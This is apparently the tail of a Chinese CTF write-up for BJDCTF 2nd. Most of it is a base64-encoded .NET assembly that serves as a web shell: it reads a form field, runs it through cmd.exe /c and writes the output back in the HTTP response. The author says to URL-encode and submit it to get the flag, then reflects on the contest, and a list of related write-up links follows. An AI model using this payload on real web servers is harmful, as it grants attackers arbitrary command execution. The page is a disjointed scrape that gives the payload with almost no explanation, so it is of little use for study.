AAAAABMAnQAAAAAABAAAAAAAAAAAAAAAAQAiAAAAAAAAAAA8TW9kdWxlPgBkZ3BrNXJsNS5kbGwARQBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AC5jdG9yAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkZ3BrNXJsNQBTeXN0ZW0uV2ViAEh0dHBDb250ZXh0AGdldF9DdXJyZW50AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAQ2xlYXJFcnJvcgBIdHRwUmVzcG9uc2UAZ2V0X1Jlc3BvbnNlAENsZWFyAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFByb2Nlc3NTdGFydEluZm8AZ2V0X1N0YXJ0SW5mbwBzZXRfRmlsZU5hbWUASHR0cFJlcXVlc3QAZ2V0X1JlcXVlc3QAU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkAE5hbWVWYWx1ZUNvbGxlY3Rpb24AZ2V0X0Zvcm0AZ2V0X0l0ZW0AU3RyaW5nAENvbmNhdABzZXRfQXJndW1lbnRzAHNldF9SZWRpcmVjdFN0YW5kYXJkT3V0cHV0AHNldF9SZWRpcmVjdFN0YW5kYXJkRXJyb3IAc2V0X1VzZVNoZWxsRXhlY3V0ZQBTdGFydABTeXN0ZW0uSU8AU3RyZWFtUmVhZGVyAGdldF9TdGFuZGFyZE91dHB1dABUZXh0UmVhZGVyAFJlYWRUb0VuZABXcml0ZQBGbHVzaABFbmQARXhjZXB0aW9uAAAPYwBtAGQALgBlAHgAZQAAB2MAbQBkAAAHLwBjACAAAAAAAFPrEJ4OwFZKu3aYOkFG4/oACLd6XFYZNOCJAyAAAQQgAQEICLA/X38R1Qo6BAAAEhEEIAASFQQgABIZBCAAEiEEIAEBDgQgABIlBCAAEikEIAEODgUAAg4ODgQgAQECAyAAAgQgABIxAyAADggHBBIREh0ODggBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEAAAC0JgAAAAAAAAAAAADOJgAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwCYAAAAA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
经过url编码之后传入,getflag:
写到最后:
题目总的来说是不难的,但是自己为什么没有做出几道题目来呢
首先,自己的思路没有拓宽,想的不全面,没有注重细节,其次知识点还是不够,有所欠缺
还有就是比赛过程中没有认真去做题,抱着可做可不做的心态,一看这道题目有点困难就放弃
完全不去想怎么去做,看来还是在家太闲,太懒,完全没有自律,,,,
BJDCTF 2nd WEB相关推荐
- [BJDCTF 2nd] Web复现 wp
文章目录 [BJDCTF 2nd] fake google [BJDCTF 2nd]old-hack [BJDCTF 2nd]假猪套天下第一 [BJDCTF 2nd]duangShell [BJDCT ...
- 【BJDCTF 2nd—Web】做题+复现记录
fake google 随便输入然后查看源代码发现 ssti,应该是服务器模板注入,查了一个payload直接就可以查到flag {{().__class__.__bases__[0].__subcl ...
- [BJDCTF 2nd] web题-假猪套天下第一
复现环境:buuoj.cn 出题人是y1ng师傅~ 使用admin登录有提示框. 使用其他账号登录获取数据包发现有其他页面 访问这个页面 翻译过来,意思是抱歉,此网站将在99年后开放! 抓包发现有时间 ...
- [BUUCTF-pwn]——[BJDCTF 2nd]secret
[BUUCTF-pwn]--[BJDCTF 2nd]secret 这道题目,看就考验你的汇编能力了. 因为在反汇编的过程中,有一个函数过大,无法反汇编 在IDA中看到一个格外令人喜欢的东西,可是if ...
- [BUUCTF-pwn]——[BJDCTF 2nd]rci
[BUUCTF-pwn]--[BJDCTF 2nd]rci 题目地址: https://buuoj.cn/challenges#[BJDCTF%202nd]rci checksec 检查和 IDA大家 ...
- [BUUCTF-pwn]——[BJDCTF 2nd]ydsneedgirlfriend2
[BUUCTF-pwn]--[BJDCTF 2nd]ydsneedgirlfriend2 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]ydsneedg ...
- [BUUCTF-pwn]——[BJDCTF 2nd]test
[BUUCTF-pwn]--[BJDCTF 2nd]test 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]test 用户名是ctf , 密码是test ...
- [BUUCTF-pwn]——[BJDCTF 2nd]r2t3
[BUUCTF-pwn]--[BJDCTF 2nd]r2t3 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]r2t3 题目: 先将文件下载下来,chec ...
- BJDCTF 2nd writeup(二)
文章目录 Misc [BJDCTF 2nd]A_Beautiful_Picture [BJDCTF 2nd]小姐姐-y1ng [BJDCTF 2nd]TARGZ-y1ng [BJDCTF 2nd]Im ...
最新文章
- gvgai框架搭建及controller编写
- 远程桌面的分辨率最大不会超过本机真实物理机的分辨率
- 用ruby的net/ssh链接远程的服务器
- mongodb基本语句
- Qt5.12编译MySQl5.1.37驱动
- 输入文字加下划线_微信昵称这样设置,文字加上下划线!
- linux生成一个list文件,Linux 获取文件名称生成列表 txt - create_filelist
- php递归面包屑,php实现面包屑导航例子分享,_PHP教程
- java中的小知识点
- 一些关于虚拟交易的有趣文章
- 【渝粤教育】广东开放大学 财会法规和职业道德 形成性考核 (26)
- AR/MR技术的应用
- 神仙文献管理软件Mendeley 保姆级教程
- 【数据库原理及应用】经典题库附答案(14章全)——第一章:数据库基础知识
- JeePlus:代码生成器
- ITIL服务管理知识体系的介绍
- 针式打印机保养方法汇总
- 教师对php作品评语通用,期末教师给学生的评语
- mysql ndbcluster 缺点_MySQL集群 -- NDB Cluster
- SpringSecurity:登录